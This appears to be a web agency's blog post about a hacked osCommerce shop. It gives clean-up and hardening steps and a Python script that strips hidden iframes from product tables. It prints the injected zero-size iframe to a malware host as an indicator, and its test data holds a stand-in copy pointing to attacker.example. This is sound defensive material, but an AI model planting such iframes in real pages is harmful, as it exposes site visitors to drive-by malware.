A few days ago we had someone get in touch as their OS Commerce implementation had been hacked into and their shop had been compromised by a malware distributor.
The shop owner had been alerted by Google Adwords, who suspended their account until they got it sorted.
This particular hack creates an invisible iframe in your pages which links through to another site without the person browsing the website knowing – the new invisible window then tries to download bad programs onto their computer.
The giveaway with this exploit is in the page source. View it, and if it contains the following code:
<iframe src="http://www.vcp-counter.com/unique/index.php" width=0 height=0 frameborder=0></iframe>
then your site has been hacked.
In this case the hackers got into the admin area because the admin directory was not password protected (it should be protected by htaccess). They then uploaded some PHP files into the images directory, which allowed them to go through the site and also gave them access to the MySQL database running the e-commerce shop.
Having access to the database, they then added the above iframe code to every category and product description in the shop.
What we did to clean it out:
- Downloaded all site files, scanned and cleansed them
- Removed all of the files the hackers had added
- Scanned the database for the ‘iframe’ code and removed it. In this case it was in every ‘description’ field in the products_description and categories_description tables, so we removed the iframe links from the descriptions
- Renamed the admin area so that it was not admin any more
- Changed the FTP password on the server, then removed FTP access and secured the site so it can only be accessed by SFTP (secure FTP)
- Changed the database username and password to something different
- Password protected the new admin area
After this the site owner was able to restart their Adwords campaign and start selling again.
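The database scan from the clean-up list could be scripted as below. This is an added example, not the code we ran on the day: it uses an in-memory SQLite database with constructed rows, the key and column names are assumptions, and it matches any zero-size iframe rather than one specific address, so it goes a little beyond the single string shown above.

```python
import re
import sqlite3

# An <iframe> whose width or height is set to 0, through to its closing tag.
# Iframes with a real size (e.g. an embedded video) are left untouched.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b(?=[^>]*\b(?:width|height)\s*=\s*[\"']?0\b)[^>]*>.*?</iframe\s*>",
    re.IGNORECASE | re.DOTALL,
)

def clean_table(db, table, key, column):
    """Strip hidden iframes from one text column; return the keys of changed rows."""
    # table/key/column come from the fixed list in demo(), never from user input.
    changed = []
    rows = db.execute(f"SELECT {key}, {column} FROM {table}").fetchall()
    for row_id, text in rows:
        original = text or ""
        cleaned = HIDDEN_IFRAME.sub("", original)
        if cleaned != original:
            db.execute(f"UPDATE {table} SET {column} = ? WHERE {key} = ?",
                       (cleaned, row_id))
            changed.append(row_id)
    return changed

# Constructed sample of an injected tag (placeholder domain, not a real indicator).
INJECTED = ('<iframe src="http://attacker.example/index.php" '
            'width=0 height=0 frameborder=0></iframe>')

def demo():
    """Build a constructed shop database, clean it, and report what changed."""
    db = sqlite3.connect(":memory:")
    # Assumed schema: only the table names and 'description' come from the post.
    db.execute("CREATE TABLE products_description (products_id INTEGER, description TEXT)")
    db.execute("CREATE TABLE categories_description (categories_id INTEGER, description TEXT)")
    db.executemany("INSERT INTO products_description VALUES (?, ?)", [
        (1, "Blue widget, 10cm." + INJECTED),
        (2, 'Demo: <iframe src="https://video.example/v/1" width="560" height="315"></iframe>'),
        (3, "Plain description"),
    ])
    db.execute("INSERT INTO categories_description VALUES (1, ?)", ("Widgets" + INJECTED,))
    targets = [("products_description", "products_id"),
               ("categories_description", "categories_id")]
    report = {t: clean_table(db, t, k, "description") for t, k in targets}
    return db, report

if __name__ == "__main__":
    print(demo()[1])
```

Run something like this against a backup copy first, and keep the list of changed rows so each one can be checked by eye afterwards.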